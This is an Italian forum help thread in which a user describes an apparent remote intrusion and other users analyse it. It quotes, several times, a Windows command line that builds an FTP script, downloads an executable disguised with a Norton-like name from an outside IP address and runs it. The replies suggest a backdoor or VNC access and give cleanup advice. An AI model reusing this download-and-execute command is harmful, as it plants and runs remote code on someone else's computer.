[help] effetto a cui non so dare spiegazione

[mibfb]

salve, oggi pomeriggio ero tranquillamente davanti al computer quando mi e' successo un fatto inspiegabile. a un certo punto il mouse mi e' aprtito ha aperto lo start e la voce "esegui" inserendo e lanciando questa frase:

cmd /c echo OPEN 151.37.183.77 18488>x&echo GET 84785_norton.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_norton.exe&del x&exit


ora aprimo sguardo penso che sia stato qualcuno che e' entrato nel mio pc e ha tentato di cancellare norton. ditemi la vostra e nel caso quali precauzioni prendere e sopratutto cosa questo comando ha fatto al mio pc.

grazie

[GmG]

Quote:

Originariamente inviato da mibfb

salve, oggi pomeriggio ero tranquillamente davanti al computer quando mi e' successo un fatto inspiegabile. a un certo punto il mouse mi e' aprtito ha aperto lo start e la voce "esegui" inserendo e lanciando questa frase:

cmd /c echo OPEN 151.37.183.77 18488>x&echo GET 84785_norton.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_norton.exe&del x&exit


ora aprimo sguardo penso che sia stato qualcuno che e' entrato nel mio pc e ha tentato di cancellare norton. ditemi la vostra e nel caso quali precauzioni prendere e sopratutto cosa questo comando ha fatto al mio pc.

grazie

Non è qualcuno che ti è entrato nel pc ma hai qualcosa nel pc che ha usato dei comandi da prompt per scaricare con FTP il file 84785_norton.exe e poi eseguirlo.

[mibfb]

si ma il norton questa cosa me la dovrebbe trovare giusto? e poi come e' avvenuto il fatto mi ha fatto proprio pensare a un attacco visto cheho visto partire il mouse andare su start aprire l'esegui e incollare quella stringa e lanciare.

[blackbit]

più ke comando remoto sembra proprio desktop remoto! xkè il mouse da solo non si muove.

stacci attento, proteggiti a dovere ke internet non è un giardinetto

[bReAkDoWn]

Quote:

Originariamente inviato da mibfb

salve, oggi pomeriggio ero tranquillamente davanti al computer quando mi e' successo un fatto inspiegabile. a un certo punto il mouse mi e' aprtito ha aperto lo start e la voce "esegui" inserendo e lanciando questa frase:

cmd /c echo OPEN 151.37.183.77 18488>x&echo GET 84785_norton.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_norton.exe&del x&exit


ora aprimo sguardo penso che sia stato qualcuno che e' entrato nel mio pc e ha tentato di cancellare norton. ditemi la vostra e nel caso quali precauzioni prendere e sopratutto cosa questo comando ha fatto al mio pc.

grazie

Avevi mica attivo un server winvnc? Altrimenti potresti avere una backdoor che permette a un utente remoto di eseguire operazioni sul tuo pc. Fai in ogni caso qualche scansione online.

Come giustamente ti hanno detto, qualcuno o qualcosa ha scaricato ed eseguito quel file sul tuo pc, ma quello che è strano è il modo in cui è stato eseguito il comando. Fosse stato un trojan o cmq un programma in esecuzione sul tuo pc, avrebbe scelto la strada più difficile e allo stesso tempo plateale per eseguire quella operazione. Infatti un programma avrebbe potuto tranquillamente scaricare ed eseguire il file senza che tu ti accorgessi di niente, e anche a livello di codice sarebbe stato molto più semplice che far spostare il mouse, eseguire un click ecc. Inoltre considerando l'indirizzo a cui ti hanno fatto accedere, l'ipotesi di intervento manuale si rafforza.
Esso infatti corrisponde ad adsl-77-183.37-151.net24.it: una adsl di libero. Probabilmente questo qualcuno ha aperto un server ftp sul suo pc e l'ha utilizzato temporaneamente per far arrivare quel file sul tuo computer lanciando una sessione ftp.
Infine, se vuoi sapere cosa abbia fatto quel file, l'unica cosa che puoi fare è provare a cercarlo nel tuo pc. Esegui anche tu cmd, poi esegui dir e guarda se il file c'è ancora. Se non lo trovi lì prova a cercarlo in tutte le cartelle con la funzione trova file o cartelle di windows.